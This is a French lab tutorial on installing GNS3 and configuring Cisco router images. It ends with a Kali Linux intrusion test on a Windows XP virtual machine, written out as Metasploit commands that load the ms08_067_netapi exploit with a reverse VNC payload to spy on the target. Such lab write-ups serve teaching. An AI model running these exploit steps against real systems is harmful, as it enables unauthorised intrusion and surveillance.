TP sur GNS3
Par Ingénieur MOUBITANG 655-11-28-84 / 651-58-79-78 [email protected]
GNS3 est un emulateur et non un simulateur comme Cisco Packet
1. Installation de GNS3.
- On va commencer par double cliquer sur l’application GNS3
- A un certain moment, on doit devoir cliquer sur « annuler » vu qu’on a par exemple pas la
connexion internet pour faire cette partie
- Par après on va cliquer sur « Non » puisqu’on n’a pas internet pour télécharger « Wireshark »
- Dans la prochaine étape on va encore faire « Annuler » et ensuite « Non ». On va prendre
« Non » car on n’a pas l’argent
2. Travail dans GNS3
2.1.Importation et configuration du routeur c3725
- Quand GNS3 a fini d’installer, on peut tout annuler pour commencer le travail
- On va cliquer sur « Edit », puis sur « Preferences », et enfin on selectionne « IOS routers »
- On va maintenant cliquer sur « New » et essayer d’importer un nouveau routeur dans le
projet
- On va aller dans le dossier « ATELIER » et décompresser le fichier ZIP qui s’y trouve. On va
donc sélectionner le 1er fichier et cliquer sur « Yes » après.
- On va cliquer sur « Next », on laissera le nom par défaut ; ensuite on laissera la capacité
128MiB pour la RAM par défaut
- Maintenant on va configurer les adaptateurs du routeur. Les deux derniers adaptateurs que
j’ai choisis tel que sur la figure ci-dessous, sont de adaptateurs « Fast-Ethernet »
- On va maintenant dire qu’on veut 2 ports par adaptateur du routeur en faisant ceci
- Pour terminer l’importation et la configuration de notre routeur, on va cliquer sur le bouton
« Idle-PC finder » et on clique sur « finish » pour terminer
2.2.Importation et configuration du routeur c7200
- On va cette fois sélectionner le 2ème fichier présent dans notre dossier dezippé
- On doit laisser le nom « c7200 » par défaut et ensuite laisser la RAM « 512MiB » par défaut
- On clique une fois de plus sur « Idle-PC finder »
3. Utilisation de l’IOS installé
- Commençons par tester notre router, nous devons sélectionner le router et le déposer dans
l’espace de travail.
- Ensuite on fait un clic droit sur le router et on clique sur « Start »
- On fait un autre clic droit et on clique sur « Console »
- Maintenant qu’on a pu installer windows 10 sur VirtualBox, on va commencer par le faire
voir sur GNS3
** On va cliquer sur « Edit », puis « Préférences », puis sur « VirtualsBox VMs », et enfin sur
« New »
- Pour le moment on nous propose juste un ordi, on va laisser et cliquer sur « finish »
- On va revenir sur notre interface de travail et on va porter 2 routeurs « c3725 » et on va faire
un clic droit sur chacun d’eux et sélectionner « Auto Idle-PC » ceci afin de réduire la
consommation du processeur
- On va par la suite porter notre ordi windows 10 et déposer. On obtient ceci
- Pour pouvoir connecter l’ordi à R1, on va commencer par augmenter son nombre de ports à
4 puisque le seul port que possède cet ordi pour le moment n’est pas dédié à la connexion
avec le routeur. On va donc faire un clic droit sur l’ordi, cliquer sur « configure », on
sélectionne l’onglet « Network » et on met le nombre de port à « 4 »
- Je vais maintenant sélectionner « Ethernet1 » sur l’ordi et démarrer l’ordi
TEST D’INTRUSION DEPUIS KALI LINUX SUR WINDOWS XP
1. Configuration de l’adresse IP statique sur kali
- Nano /etc/network/interfaces
- Dans le fichier de configuration on entre les valeurs ci-dessous pour configurer la carte
réseau de notre ordi kali
On va faire « ctrl + x » et taper sur la touche « Entrer »
- Ensuite on va redémarrer les services on fait
/etc/init.d/networking restart && reboot
2. Configuration de l’adresse IP sur Windows XP
- On va aller sur le poste de travail, et à partir de là on va faire un clic droit sur « Favoris
réseau »
- Par la suite on va faire un clic droit sur l’icône qui nous est présenté, et choisir « Propriétés »
- On va sélectionner « Protocole internet (TCP/IP) » et cliquer sur « Propriétés »
3. Déploiement de l’environnement d’intrusion sur kali linux
- Pour commencer, on doit d’abord veiller à ce que nos machines virtuelles puissent
communiquer en réseau. De ce fait, on va sur notre virtualbox aller configurer chaque
machine virtuelle telle que le présente la figure ci-dessous
- Pour permettre à kali de pouvoir voir windows xp, on doit aller désactiver le parefeu de
windows.
** De ce fait, on va faire un clic sur l’icône du bouclier rouge qui se trouve sur la barre de
menu windows
** Ensuite on va cliquer sur « Pare-feu windows »
** On va cliquer sur « Désactivé » et enfin sur « OK »
- Sur kali on doit d’abord vérifier que nos 2 machines virtuelles communiquent. La figure ci-
dessous montre bien que nos machines sont en communication. Mais essayons de ne pas
désactiver le pare-feu de windows pour voir si ces 2 machines vont toujours communiquer
- Sur kali on va faire « msfconsole » au niveau du terminal. Ceci va activer « MetaSploit »
- On va lancer la recherche de faille sur windows XP avec la commande « msf > search
netapi »
- Si on regarde avec attention cette ligne que j’ai selectionné, on verra que c’est elle qu’on
utilisera pour tenter notre intrusion sur windows xp.
** On va taper la commande « msf > use exploit/windows/smb/ms08_067_netapi »
** On va maintenant faire « msf > show payloads » pour voir la somme des charges
- On va maintenant exécuter les commande qui nous permettront d’espionner tout qu’on
fait sur windows
** msf > set payload windows/vncinject/reverse_tcp
** msf > set rhost 172.16.16.2 pour remote la machine distance (windows XP)
** msf > set lhost 172.16.16.1 pour localhost pour kali
** on va maintenant entre msf > run
- Voici donc le résultat de notre 1ère intrusion : espionner la machine windows xp à partir de
kali linux